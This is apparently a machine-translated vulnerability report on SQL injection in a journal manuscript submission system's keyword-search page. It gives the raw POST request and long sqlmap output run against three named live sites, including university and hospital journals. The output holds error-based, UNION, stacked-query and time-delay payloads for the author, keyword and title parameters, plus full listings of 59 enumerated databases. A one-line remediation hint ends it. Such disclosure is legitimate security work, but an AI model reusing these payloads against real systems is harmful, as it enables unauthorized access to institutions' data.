General SQL injection vulnerability in a contribution system (affecting many enterprises and schools)
Many search results are found here. Take a few tests:
POST/web/keysearch. aspx HTTP/1.1
Host: www.XXXX.com
User-Agent: Baiduspider
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Cookie: pai_lasttime = 1410760097025; pai_count = 0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Author = 1 & butSearch = % e6 % 9f % a5 % e8 % af % a2 & keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Case 1: Hunan University http://dxjykx.cnmanu.cn/
Sqlmap identified the following injection points with a total of 0 HTTP (s) reque
Sts:
---
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1% 'AND 9293 = CONVERT (INT, (select char (58) + CHAR (109) + CHAR (105
) + CHAR (112) + CHAR (58) + (SELECT (case when (9293 = 9293) then char (49) else char (48)
END) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58 ))) AND '%' = '& butSearch = ?? & Ke
Yword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: UNION query
Title: Generic UNION query (NULL)-6 columns
Payload: author = 1% 'Union all select null, CHAR (58) + CHAR (1
09) + CHAR (105) + CHAR (112) + CHAR (58) + CHAR (100) + CHAR (74) + CHAR (79) + CHAR (71) + CHAR (115) +
CHAR (88) + CHAR (77) + CHAR (80) + CHAR (88) + CHAR (82) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (11
7) + CHAR (58), NULL -- & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state
= & Title = wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author = 1% '; waitfor delay '0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 &
Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author = 1% 'waitfor delay' 0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 & N
Ian = 2016 & operat = & Qi = 1 & state = & title = wolf
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1 & butSearch = ?? & Keyword = assd % 'AND 4223 = CONVERT (INT, (SELECT C
HAR (58) + CHAR (109) + CHAR (105) + CHAR (112) + CHAR (58) + (SELECT (case when (4223 = 4223) TH
En char (49) else char (48) END) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58 )))
AND '%' = '& Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: UNION query
Title: Generic UNION query (78)-6 columns
Payload: author = 1 & butSearch = ?? & Keyword = assd % 'Union all select 78, 78, 78, 7
8, 78, CHAR (58) + CHAR (109) + CHAR (105) + CHAR (112) + CHAR (58) + CHAR (75) + CHAR (90) + CHAR (88
) + CHAR (113) + CHAR (110) + CHAR (103) + CHAR (76) + CHAR (85) + CHAR (80) + CHAR (114) + CHAR (58) + CH
AR (115) + CHAR (97) + CHAR (117) + CHAR (58) -- & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title =
Wolf
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % 'AND 4163 = CONVERT (INT, (select char (58) + CHAR (109) + CHAR (105) + CHAR (1
12) + CHAR (58) + (SELECT (case when (4163 = 4163) then char (49) else char (48) END) + CH
AR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58) AND '%' ='
Type: UNION query
Title: Generic UNION query (78)-6 columns
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % 'union all select 78, 78, 78, 78, CHAR (58) + CHAR (109) + CHAR (105) + CH
AR (112) + CHAR (58) + CHAR (108) + CHAR (97) + CHAR (79) + CHAR (74) + CHAR (71) + CHAR (110) + CHAR (69
) + CHAR (116) + CHAR (108) + CHAR (82) + CHAR (58) + CHAR (115) + CHAR (97) + CHAR (117) + CHAR (58), 7
8 --
---
There were multiple injection points, please select the one to use for following
Injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[Q] Quit
>
[13:41:08] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:41:08] [INFO] testing if current user is DBA
Current user is DBA: False
[13:41:08] [INFO] fetching database names
[13:41:08] [INFO] the SQL query used returns 59 entries
Available databases [59]:
[*] Bl
[*] Cdxxgc
[*] Cg
[*] Cghy
[*] Cy
[*] Cymx
[*] D1
[*] Demcom
[*] Demo
[*] Dj
[*] Dxjykx
[*] Eye
[*] Gjzhyx
[*] GuaHao
[*] Hh
[*] Hhzrkx
[*] Hlgl
[*] Hnxbyx
[*] Hxyqdz
[*] J4e
[*] Jjyx
[*] Lcjsyx
[*] Lcjyzzs
[*] Lcsjbx
[*] Lcsjwk
[*] Lnyxybj
[*] Main
[*] Master
[*] Mfskin
[*] Model
[*] Mrzxwk
[*] Msdb
[*] Mz
[*] Mzyfs
[*] Njsd
[*] Nky
[*] Northwind
[*] Nxgb
[*] Nydxxb
[*] Pifu
[*] Pubs
[*] Rfic
[*] SMS
[*] St
[*] Sypfb
[*] Tempdb
[*] Test
[*] Wcbx
[*] Wf
[*] Wlxb
[*] Xdx
[*] Xhnj
[*] Xjyx
[*] Xnxyxb
[*] Yxjz
[*] Zdblx
[*] Zjyx
[*] Zr
[*] Zxy.pdf
[13:41:08] [INFO] fetched data logged to text files under 'I :\???? \ SQLMAP ~ 1 \ Bin \
Output \ dxjykx.cnmanu.cn'
[*] Shutting down at 13:41:08
Case 2: Renji Hospital, Shanghai Jiao Tong University School of Medicine, http://www.cjge-manuscriptcentral.com
D: \ Python27 \ sqlmap> sqlmap. py-r 1.txt -- dbs
Sqlmap/0.9-automatic SQL injection and database takeover tool
Http://sqlmap.sourceforge.net
[*] Starting at: 13:25:16
[13:25:16] [INFO] parsing HTTP request from '1.txt'
[13:25:16] [INFO] using 'd: \ Python27 \ sqlmap \ output \ www. cjge-manuscriptcentral.co
M \ session 'as session file
[13:25:16] [INFO] resuming injection data from session file
[13:25:16] [INFO] resuming back-end DBMS 'Microsoft SQL server 100' from sessio
N file
[13:25:16] [INFO] testing connection to the target url
Sqlmap identified the following injection points with a total of 0 HTTP (s) reque
Sts:
---
Place: POST
Parameter: author
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author = 1'; waitfor delay '0: 0: 5'; -- AND 'enfs' = 'enfs & butSearch = Query
& Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = Mr.
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author = 1 'waitfor delay' 0: 0: 5' -- AND 'exwq' = 'exwq & butSearch = query & k
Eyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = Mr.
---
[13:25:17] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:25:17] [INFO] fetching database names
[13:25:17] [INFO] fetching number of databases
[13:25:17] [WARNING] time-based comparison needs larger statistical model. Makin
G a few dummy requests, please wait ..
59
[13:25:47] [INFO] retrieved:
[13:25:52] [WARNING] adjusting time delay to 1 second
Bl
[13:26:33] [INFO] retrieved: cdxxgc
[13:27:12] [INFO] retrieved: cg
[13:27:25] [INFO] retrieved: cghy
[13:27:51] [INFO] retrieved: cy
[13:28:03] [INFO] retrieved: cymx
[13:28:30] [INFO] retrieved: d1
[13:28:42] [INFO] retrieved: demcom
[13:29:18] [INFO] retrieved: demo
[13:29:44] [INFO] retrieved: dj
[13:29:58] [INFO] retrieved: dxjykx
[13:30:39] [INFO] retrieved: Eye
[13:30:56] [INFO] retrieved: gjzhyx
[13:31:38] [INFO] retrieved: GuaHao
[13:32:13] [INFO] retrieved: hh
[13:32:30] [INFO] retrieved: hhzrkx
[13:33:13] [INFO] retrieved: hlgl
[13:33:43] [INFO] retrieved: hnxbyx
[13:34:26] [INFO] retrieved: hxyqdz
[13:35:07] [INFO] retrieved: j4e
[13:35:27] [INFO] retrieved: jjyx
[13:35:55] [INFO] retrieved: lcjsyx
[13:36:35] [INFO] retrieved: lcjyzzs
[13:37:23] [INFO] retrieved: lcsjbx
If the vulnerability is not detected, you can obtain the database information for the vulnerability!
Case 3: China cosmetic and orthopedic journal mr.cnmanu.cn
Sqlmap identified the following injection points with a total of 0 HTTP (s) reque
Sts:
---
Place: POST
Parameter: title
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % 'AND 7683 = CONVERT (INT, (select char (58) + CHAR (104) + CHAR (119) + CHAR (1
14) + CHAR (58) + (SELECT (case when (7683 = 7683) then char (49) else char (48) END) + CH
AR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58) AND '%' ='
Type: UNION query
Title: Generic UNION query (41)-6 columns
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % 'union all select 41, 41, 41, 41, CHAR (58) + CHAR (104) + CHAR (119) + CH
AR (114) + CHAR (58) + CHAR (76) + CHAR (69) + CHAR (116) + CHAR (66) + CHAR (113) + CHAR (78) + CHAR (71
) + CHAR (76) + CHAR (75) + CHAR (98) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58), 41
--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % '; waitfor delay '0: 0: 5 '--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author = 1 & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & stat
E = & title = wolf % 'waitfor delay' 0: 0: 5 '--
Place: POST
Parameter: keyword
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1 & butSearch = ?? & Keyword = assd % 'AND 2981 = CONVERT (INT, (SELECT C
HAR (58) + CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + (SELECT (case when (2981 = 2981) TH
En char (49) else char (48) END) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58 ))
) AND '%' = '& Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: UNION query
Title: Generic UNION query (41)-6 columns
Payload: author = 1 & butSearch = ?? & Keyword = assd % 'Union all select 41, 41, 41, 4
1, 41, CHAR (58) + CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + CHAR (122) + CHAR (72) + CHAR (1
05) + CHAR (70) + CHAR (111) + CHAR (73) + CHAR (83) + CHAR (98) + CHAR (117) + CHAR (100) + CHAR (58) + C
HAR (110) + CHAR (119) + CHAR (116) + CHAR (58) -- & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & titl
E = wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author = 1 & butSearch = ?? & Keyword = assd % '; waitfor delay '0: 0: 5' -- & Lm = 2 &
Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author = 1 & butSearch = ?? & Keyword = assd % 'waitfor delay' 0: 0: 5' -- & Lm = 2 & N
Ian = 2016 & operat = & Qi = 1 & state = & title = wolf
Place: POST
Parameter: author
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based-WHERE or HAVING clause
Payload: author = 1% 'AND 6529 = CONVERT (INT, (select char (58) + CHAR (104) + CHAR (119
) + CHAR (114) + CHAR (58) + (SELECT (case when (6529 = 6529) then char (49) else char (48)
END) + CHAR (58) + CHAR (110) + CHAR (119) + CHAR (116) + CHAR (58 ))) AND '%' = '& butSearch = ?? & K
Eyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: UNION query
Title: Generic UNION query (NULL)-6 columns
Payload: author = 1% 'Union all select null, CHAR (58) +
CHAR (104) + CHAR (119) + CHAR (114) + CHAR (58) + CHAR (119) + CHAR (119) + CHAR (101) + CHAR (76) + CH
AR (87) + CHAR (114) + CHAR (81) + CHAR (75) + CHAR (70) + CHAR (71) + CHAR (58) + CHAR (110) + CHAR (119
) + CHAR (116) + CHAR (58) -- & butSearch = ?? & Keyword = assd & Lm = 2 & Nian = 2016 & operat = & Qi = 1 & st
Ate = & title = wolf
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: author = 1% '; waitfor delay '0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 &
Nian = 2016 & operat = & Qi = 1 & state = & title = wolf
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: author = 1% 'waitfor delay' 0: 0: 5' -- & butSearch = ?? & Keyword = assd & Lm = 2 & N
Ian = 2016 & operat = & Qi = 1 & state = & title = wolf
---
There were multiple injection points, please select the one to use for following
Injections:
[0] place: POST, parameter: author, type: Single quoted string (default)
[1] place: POST, parameter: title, type: Single quoted string
[2] place: POST, parameter: keyword, type: Single quoted string
[Q] Quit
>
[13:40:55] [INFO] the back-end DBMS is Microsoft SQL Server
Web server operating system: Windows 2003
Web application technology: ASP. NET, Microsoft IIS 6.0, ASP. NET 2.0.50727
Back-end DBMS: Microsoft SQL Server 2000
[13:40:55] [INFO] testing if current user is DBA
Current user is DBA: False
[13:40:55] [INFO] fetching database names
[13:40:55] [INFO] the SQL query used returns 59 entries
Available databases [59]:
[*] Bl
[*] Cdxxgc
[*] Cg
[*] Cghy
[*] Cy
[*] Cymx
[*] D1
[*] Demcom
[*] Demo
[*] Dj
[*] Dxjykx
[*] Eye
[*] Gjzhyx
[*] GuaHao
[*] Hh
[*] Hhzrkx
[*] Hlgl
[*] Hnxbyx
[*] Hxyqdz
[*] J4e
[*] Jjyx
[*] Lcjsyx
[*] Lcjyzzs
[*] Lcsjbx
[*] Lcsjwk
[*] Lnyxybj
[*] Main
[*] Master
[*] Mfskin
[*] Model
[*] Mrzxwk
[*] Msdb
[*] Mz
[*] Mzyfs
[*] Njsd
[*] Nky
[*] Northwind
[*] Nxgb
[*] Nydxxb
[*] Pifu
[*] Pubs
[*] Rfic
[*] SMS
[*] St
[*] Sypfb
[*] Tempdb
[*] Test
[*] Wcbx
[*] Wf
[*] Wlxb
[*] Xdx
[*] Xhnj
[*] Xjyx
[*] Xnxyxb
[*] Yxjz
[*] Zdblx
[*] Zjyx
[*] Zr
[*] Zxy.pdf
[13:40:55] [INFO] fetched data logged to text files under 'I :\???? \ SQLMAP ~ 1 \ Bin \
Output \ mr.cnmanu.cn'
[*] Shutting down at 13:40:55
Solution:
It is relatively simple to fix vulnerabilities. Multiple POST global filtering